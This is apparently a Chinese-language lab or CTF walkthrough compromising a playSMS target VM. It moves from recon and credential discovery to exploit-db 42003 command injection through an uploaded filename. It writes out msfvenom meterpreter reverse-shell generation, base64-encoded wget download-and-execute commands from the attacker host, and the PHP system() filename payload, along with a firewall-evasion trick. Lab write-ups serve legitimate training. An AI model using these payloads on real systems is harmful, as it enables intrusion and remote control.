主機:192.168.32.152
靶機:192.168.32.167
首先nmap,nikto -host,dirb 探測
robots.txt目錄下
在/nothing目錄中,查看源碼發現pass
在secure目錄下發現一個zip文件,下載下來,發現密碼freedom即可打開
然后發現mp3文件其實是text文本,cat打開
發現一段文字還有個url,打開url,用戶:touhid,密碼嘗試出為diana
進入了頁面
然后我們就看一看當前cms有沒有已知的可利用漏洞,searchsploit playSMS
該漏洞目錄是 /usr/share/exploitdb/exploits/php/webapps/42003.txt cat下,cat下該漏洞查看該漏洞描述
大致意思就是說存在一個上傳點,但文件名要改成另一種格式,就可執行和上傳文件相關的代碼
目錄在app=main&inc=core_welcome,打開確實有上傳點,上傳csv文件的點
用bp上傳抓包改文件名測試下,確實存在命令注入
那我們就可以制作並上傳一個反彈shell
shell為: linux/x86/meterpreter/reverse_tcp
msfvenom -p生成
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 elf> /var/www/html/s
重定向到apache服務器,通過執行下載命令,再修改權限
再用msfconsole監聽即可
首先開啟apache服務器:
survice apache2 start 開啟
survice apache2 status 查看狀態
再利用命令注入漏洞上傳,使用命令注入漏洞時,我們可以先用base64轉碼繞過防火牆
echo 'wget http://192.168.32.152/s -O /tmp/a' | base64
echo 'chmod 777 /tmp/a' | base64
echo '/tmp/a' | base64
再在bp 中用命令 "<?php system(base64_decode('XXXXXXXX')); dia();?>.php"
最終完成三個命令上傳拿到反彈shell